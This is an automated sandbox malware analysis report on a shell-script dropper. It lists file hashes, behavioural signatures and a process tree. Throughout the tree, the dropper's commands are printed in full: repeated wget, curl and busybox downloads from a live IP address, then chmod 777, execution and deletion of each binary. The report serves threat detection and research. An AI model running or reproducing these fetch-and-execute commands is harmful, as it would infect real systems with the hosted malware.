Analysis
-
max time kernel
10s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
28/10/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
-
Size
10KB
-
MD5
8831ac149f5712a653b2ed7d4a827e57
-
SHA1
e48119cbe7dcbf516620e6b82c96350ecb491554
-
SHA256
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd
-
SHA512
368cdcd017b026288093ca2a837a48c67cee319efbe80778a1a7c80f7206446b4944f3ade0ba0e8bfa35bc140fc293621629cd99e3e8e54e7226c2598122500f
-
SSDEEP
96:HMMfw0o7MQoiYo7XjoP3uZJs/CqDyu7hlQdddimXhGXhaXh+WXhyXhCXhnEQyhlT:MAmyjhlQdddiGmSHqaGhlQddtmSHqalu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh1⤵PID:1473
-
/bin/rm/bin/rm bins.sh2⤵PID:1474
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1475
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Writes file to tmp directory
PID:1476
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1477
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:1481
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:1482
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1483
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1484
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Writes file to tmp directory
PID:1485
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1489
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:1490
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:1491
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1492
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1493
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Writes file to tmp directory
PID:1502
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1503
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:1504
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:1505
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1506
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1507
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1509
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:1511
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1512
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1513
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1515
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:1517
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1518
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1519
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1521
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:1523
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1524
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1525
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1527
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1531
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1534
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1537
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1538
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1540
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1543
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1546
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1549
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1552
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1555
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1558
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1561
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1564
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1567
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1570
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1573
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1576
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1579
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1582
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1585
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1586
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1588
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1591
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1594
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1597
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1600
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1603
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1606
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1609
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1612
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1615
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1616
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1618
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1621
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1624
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1627
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1628
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1630
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1633
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1636
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1639
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1642
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1645
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1646
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1648
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1651
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1654
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1657
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97